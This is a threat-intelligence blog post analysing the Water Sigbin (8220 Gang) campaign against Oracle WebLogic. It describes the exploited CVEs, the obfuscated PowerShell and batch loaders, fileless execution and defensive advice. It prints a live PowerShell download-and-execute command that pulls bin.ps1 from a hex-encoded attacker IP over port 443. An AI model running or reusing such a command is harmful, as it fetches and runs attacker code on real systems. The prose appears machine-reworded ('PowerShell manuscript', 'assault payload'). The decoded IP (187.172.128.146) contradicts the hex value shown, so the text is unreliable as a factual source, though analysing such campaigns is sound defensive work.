APT & Targeted Attacks
Water Sigbin (aka the 8220 Gang) exploited Oracle WebLogic vulnerabilities to deploy a cryptocurrency miner using a PowerShell script. The threat actor also adopted new techniques to conceal its activities, making attacks harder to defend against.
Read time: ( words)
- Water Sigbin utilized the vulnerabilities CVE-2017-3506 and CVE-2023-21839 to deploy a digital currency miner via a PowerShell manuscript.
- The gang employed deceptive techniques, including hexadecimal encoding of URLs and utilizing HTTP over port 443 for discreet payload distribution.
- The PowerShell manuscript and the resulting batch file employed intricate encoding, utilizing environment parameters to obscure malicious code within seemingly innocuous script elements.
- The group executed fileless operations by employing .NET reflection strategies in PowerShell scripts, enabling the malware to operate exclusively in memory, evading disk-based detection mechanisms.
- The ongoing refinement of malicious actor tools, strategies, and practices underscores the necessity for enterprises to maintain awareness and enforce diverse cybersecurity protocols, such as routine patching, staff education, and incident response strategies.
Water Sigbin (aka the 8220 Gang) is an organization based in China that has been operational since at least 2017. It concentrates on disseminating digital currency mining malware, predominantly within cloud environments and Linux servers. The group is recognized for incorporating vulnerability exploitation as part of its extensive range of strategies.
In our prior discourse regarding the…operational strategies of the collective were examined to understand their use of constantly evolving and intricate methodologies. Nevertheless, there is a dynamic nature to cyber threats, as malicious entities are consistently discovering novel approaches to circumvent security measures. Recent observations indicated that the Water Sigbin has adopted innovative techniques and practices to conceal its operations, rendering their assaults more challenging to counteract.
Upon investigation, we discovered the malevolent entity exploiting weaknesses in the Oracle WebLogic server through CVE-2017-3506 (a vulnerability enabling external OS command execution) and CVE-2023-21839 (a flaw in deserialization security) to implement a cryptocurrency mining tool utilizing a PowerShell script named bin.ps1 on the affected host. Closer examination of their tactics, techniques, and procedures (TTPs) led us to attribute this exploitation to Water Sigbin, showcasing their consistent updates to deployment strategies and tools.
The attack payload for CVE-2017-3506 was as follows:
The encoded string within the assault payload is as follows:
powershell “IEX(New-Object Net.WebClient).DownloadString(‘http://0xb9ac8092:443/bin.ps1’)”
The assault payload for CVE-2023-21839 is illustrated in Figure 2.
Throughout our analysis, we identified exploitation attempts on both Linux and Windows systems, where the threat actor utilized shell scripts on Linux machines and a PowerShell script on Windows systems. For the sake of our evaluation, we will focus on the Windows exploitation methods, presenting an intriguing obfuscation tactic employed by Water Sigbin.
At the onset of payload delivery during the exploitation of vulnerabilities, the actors leveraged distinct techniques to avoid detection:
- Utilization of hexadecimal encoding in URLs:
The URL used for downloading and executing the PowerShell script is depicted in the subsequent visualization:
The representation of this URL in dotted decimal notation equates to http://187.172.128.146:443/bin[.]ps1
- Deployment of HTTP via port 443:
As illustrated in the aforementioned URL, Water Sigbin opts for the use of HTTP over port 443 for discreet communication.
The file named bin.ps1 encompasses two components:
- A lengthy encoded string in base64 format containing binary data and associated directives for execution
- A function responsible for decoding the base64 string, saving the deciphered content into a temporary directory file named microsoft_office365.bat, and executing it covertly
The content encoded in base64, deciphered by the function Convert-Base64ToFileAndExecuteSilently in the file bin.ps1, reveals the fundamental script elements. This decoded content is then inscribed into the file microsoft_office365.bat within the temporary directory.
Evaluation of microsoft_office365.bat
The script microsoft_office365.bat utilizes environmental variables to obfuscate the primary script code, creating an illusion of complexity and obscurity. The script initiates with the following code:
Upon scrutiny of the script, it seems apparent that the establishment of environment variables appears as impenetrable or nonsensical data. Yet, after meticulous examination, it becomes evident that threat actors have adeptly concealed their malicious code using an effective approach.
To unveil the actual code, decoding the primary “if” condition is essential:
Subsequently, substitution of RxEGj with an empty value (“”) across all sections of the code is imperative. After this action, the initial segment of the script changes as follows:
The initial directive cmd /c “set __=&rem”initiates a fresh prompt command and defines the “__” variable as an empty string. It then proceeds to execute the rem (which stands for recording comments in a batch file) command, a command that has no functionality. The script segment seems intended to initiate a new command prompt window in a minimized state and then terminate the current script.
The subsequent two extensive lines consisting of base64-encoded data contain the actual binary code, necessitating processing before it can be operational. The intruder utilizes PowerShell methods to manipulate this data.
The subsequent segment includes obfuscated PowerShell code that processes the base64-encoded string for subsequent use.
In a similar fashion, decrypting the remaining section by substituting RxEGj with an empty string (“”), uncovers the actual PowerShell code:
This PowerShell instruction undertakes the following operations:
- Unpacks the base64 string ([Convert]::FromBase64String)
- Conducts decryption ([System.Security.Cryptography.Aes]) of an extensive string
- Decompresses the decrypted string ([IO.Compression.CompressionMode])
- Runs the malware code using DotNet in-memory reflection ([System.Reflection.Assembly])
By leveraging “System.Reflection.Assembly,” the attacker executes a fileless approach, ensuring that all operations are confined to memory.
The activities of Water Sigbin, specifically concerning CVE-2017-3506 and CVE-2023-21839, demonstrate the adaptability of present-day threat actors. The utilization of intricate obfuscation methods such as hexadecimal URL encoding, complex encoding within PowerShell and batch scripts, manipulation of environment variables, and layered obfuscation to hide malicious code within seemingly harmless scripts reveals Water Sigbin’s ability to effectively cover its tracks, making detection and prevention more challenging for security teams.
These evolving strategies signal the necessity for continual vigilance and proactive measures to safeguard systems and networks against advanced threats.
To enhance protection against vulnerability exploits like those executed by Water Sigbin, organizations can implement various cybersecurity best practices and proactive defense mechanisms. Here are some recommendations:
- Software patching. Give priority to routine updates and software patching to ensure that all systems are operating on the latest software versions. Swiftly apply security patches for known vulnerabilities, particularly those with public exploits.
- Network segmentation. Employ network segmentation to minimize the attack surface. By segregating crucial network segments from the broader network, the impact of potential vulnerability exploits can be lessened.
- Regular security evaluations. Conduct periodic security evaluations and vulnerability scans to detect and rectify potential weaknesses in the infrastructure before they can be exploited.
- Cybersecurity training. Educate staff about common attacker tactics to help them recognize and avoid falling prey to social engineering attacks that may precede vulnerability exploits.
- Incident response preparedness. Develop, test, and maintain an incident response plan to enable a prompt and effective response to security breaches or vulnerability exploitation.
- Threat intelligence assimilation. Subscribe to threat intelligence sources to stay informed about the latest threats and tactics employed by threat actors and advanced persistent threat (APT) groups.
The following safeguards are in place to identify malicious activities and protect Trend customers against the exploitation of the vulnerabilities discussed in this blog entry:
- 1011716 – Oracle Weblogic Server Insecure Deserialization Vulnerability (CVE-2023-21839)
- 1010550 – Oracle WebLogic WLS Security Component Remote Code Execution Vulnerability (CVE-2017-3506)
The indicators of compromise for this entry can be accessed here.
MITRE ATT&CK
| Tactic | Technique | Technique ID |
|---|---|---|
| Initial Access | Exploit Public-Facing Application | T1190 |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 |
| Defense Evasion | Deobfuscate/Decode Files or Information | T1140 |
| Obfuscated Files or Information: Command Obfuscation | T1027.010 | |
| Hide Artifacts: Hidden Window | T1564.003 | |
| Process Injection: Portable Executable Injection | T1055.002 | |
| Reflective Code Loading | T1620 | |
| Command and Control | Data Encoding: Standard Encoding | T1132.001 |
| Application Layer Protocol: Web Protocols | T1071.001 | |
| Ingress Tool Transfer | T1105 |
Tags
sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk
About Author
